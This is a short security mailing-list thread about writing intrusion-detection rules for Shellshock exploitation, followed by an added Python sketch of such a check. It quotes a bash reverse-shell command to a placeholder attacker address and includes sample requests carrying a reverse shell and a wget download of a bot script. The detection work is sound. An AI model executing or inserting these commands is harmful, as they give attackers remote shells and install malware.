[Emerging-Sigs] Do you have a rule for this?
wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014
Was thinking about this, and also curl/wget/etc with args inbound to
web_servers. Have also seen direct wgets for ELF bins, Perl DDoS bots,
Perl Downloaders etc.
On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com> wrote:
> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
> I was wondering do you already have a rule that detects the above?
> If someone was executing that in anything, it would be bad, I think.
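The check discussed in this thread, sketched in Python as an added example (it is not an Emerging Threats rule and not code from either poster): it scans the request line and headers of an inbound HTTP request, raw and URL-decoded, for the `/dev/tcp` redirect and for wget/curl invoked with a URL argument. The function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# bash /dev/tcp (or /dev/udp) redirect, as in the command quoted in the thread.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")
# wget or curl invoked with a URL argument (the "curl/wget with args" case).
FETCH = re.compile(r"\b(?:wget|curl)\s+[^\n;|&]*?(?:https?|ftp)://", re.I)

# Constructed sample requests (documentation addresses, not captured traffic).
SAMPLE_SHELL = ("GET /cgi-bin/test.cgi HTTP/1.1\r\nHost: www.example.com\r\n"
                "User-Agent: bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\r\n\r\n")
SAMPLE_FETCH = ("GET /cgi-bin/s?x=wget+http%3A%2F%2Fexample.invalid%2Fbot.pl "
                "HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
SAMPLE_BENIGN = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                 "User-Agent: curl/7.38.0\r\n\r\n")

def parse_request(raw):
    """Split a raw HTTP request into (request_line, {header_name: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def scan_request(raw):
    """Return a sorted list of (field, finding) pairs for one request."""
    request_line, headers = parse_request(raw)
    fields = {"request-line": request_line, **headers}
    hits = set()
    for field, value in fields.items():
        # Inspect both forms so percent/plus encoding does not hide the command.
        for text in {value, unquote_plus(value)}:
            if DEV_TCP.search(text):
                hits.add((field, "dev-tcp-redirect"))
            if FETCH.search(text):
                hits.add((field, "downloader-with-url"))
    return sorted(hits)

if __name__ == "__main__":
    for name, req in [("shell", SAMPLE_SHELL), ("fetch", SAMPLE_FETCH),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, scan_request(req))
```

The benign request shows why the downloader pattern requires whitespace and a URL after the tool name: a plain `curl/7.38.0` User-Agent must not alert.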